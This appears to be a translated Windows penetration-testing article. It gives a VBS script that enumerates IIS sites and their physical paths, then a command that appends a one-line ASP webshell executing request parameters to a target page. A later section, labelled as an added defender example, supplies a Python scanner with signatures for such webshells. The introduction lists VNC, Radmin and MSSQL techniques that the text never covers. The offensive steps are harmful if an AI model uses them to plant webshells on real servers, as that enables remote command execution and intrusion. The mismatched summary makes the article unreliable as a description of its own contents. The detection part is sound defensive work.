This article summarizes several techniques used in Windows penetration and privilege escalation, including clearing MSSQL Query Analyzer connection records, VNC and Radmin elevation methods, cmd directory-handling tips and webshell privilege-escalation tips.
Locating the website path:
1. Read the website's configuration files.
2. Use the following VBS:
```vbs
On Error Resume Next
' Refuse to run under wscript.exe (the GUI host); the output is meant for the console via cscript.
If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then
    MsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage:Cscript vWeb.vbs", 4096, "Lilo"
    WScript.Quit
End If
' Bind to the IIS metabase through ADSI and walk every site under W3SVC.
Set objservice = GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
    ' Site instances have numeric names (1, 2, ...); other children (filters, info nodes) do not.
    If IsNumeric(obj3w.Name) Then
        Set OService = GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
        Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
        If Err <> 0 Then WScript.Quit (1)
        WScript.Echo Chr(10) & "[" & OService.ServerComment & "]"
        ' Each binding is "IP:Port:HostHeader"; print the host header (third field).
        For Each Binds In OService.ServerBindings
            Web = "{ " & Replace(Binds, ":", " } { ") & " }"
            WScript.Echo Replace(Split(Replace(Web, " ", ""), "}{")(2), "}", "")
        Next
        ' Physical path of the site's root virtual directory.
        WScript.Echo "Path : " & VDirObj.Path
    End If
Next
```
3. List the sites with iis_spy (note: ASPX must be supported for the ASPX and IISSPY methods, which involve downgrading activeds.dll and activeds.tlb).
4. Obtain the target site directory. Then write a webshell into it, either with `echo ^<% execute(request("cmd")) %^> >> X:\target directory\X.asp` or by copying a script file to `X:\target directory\X.asp`; alternatively, try the `type` command.
Possible website directories (note: typically on virtual-host setups):
Data/htdocs. website/
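As an added defender-side example (not part of the original article), the following Python scanner looks for the one-line ASP webshell form described in step 4, including the case where it has been appended with `>>` to an otherwise legitimate page. The signature names, suffix list and sample web root are constructed for this example.

```python
import re
import tempfile
from pathlib import Path

# Signatures for the one-line ASP webshell form described above: a <% ... %> block that
# hands a request parameter straight to a script evaluator. The second one is a weaker
# indicator (legitimate admin pages may use it), so it is reported under its own name.
WEBSHELL_SIGNATURES = {
    "asp-execute-request": re.compile(
        rb"<%[^%]*?\b(execute|executeglobal|eval)\b\s*\(\s*request(\.form|\.querystring)?\s*\(",
        re.IGNORECASE,
    ),
    "asp-createobject-shell": re.compile(
        rb"createobject\s*\(\s*[\"'](wscript\.shell|shell\.application)[\"']\s*\)",
        re.IGNORECASE,
    ),
}
# Extensions IIS classic ASP maps to the script engine (constructed list for this example).
SCRIPT_SUFFIXES = {".asp", ".asa", ".cer", ".cdx", ".aspx", ".ashx"}


def scan_content(data: bytes) -> list[str]:
    """Return the names of every signature that fires on one file's bytes."""
    return [name for name, pattern in WEBSHELL_SIGNATURES.items() if pattern.search(data)]


def scan_webroot(root: Path) -> dict[str, list[str]]:
    """Walk a web root and report each script file with at least one hit, keyed by relative path."""
    findings: dict[str, list[str]] = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in SCRIPT_SUFFIXES:
            hits = scan_content(path.read_bytes())
            if hits:
                findings[path.relative_to(root).as_posix()] = hits
    return findings


def demo() -> dict[str, list[str]]:
    """Build a constructed web root (not a real site): a clean page, a page with a one-liner
    appended via '>>', a dropped file in a subdirectory and a non-script file, then scan it."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "default.asp").write_bytes(b'<% Response.Write("hello") %>\r\n')
    # Appending leaves the legitimate markup intact; only the tail of the file is malicious.
    (root / "news.asp").write_bytes(
        b'<html><% Response.Write(Now()) %></html>\r\n<%execute(request("cmd"))%>\r\n'
    )
    sub = root / "images"
    sub.mkdir()
    (sub / "x.asp").write_bytes(b'<%  Eval ( Request.Form("c") )  %>')  # whitespace variant
    (sub / "logo.png").write_bytes(b"\x89PNG not scanned")
    return scan_webroot(root)


if __name__ == "__main__":
    for rel, hits in sorted(demo().items()):
        print(f"{rel}: {', '.join(hits)}")
```

Run it against a real web root by calling `scan_webroot(Path(r"D:\wwwroot"))`; any hit is a file to examine by hand, and a "Path :" line from the IIS enumeration above tells you which roots to cover.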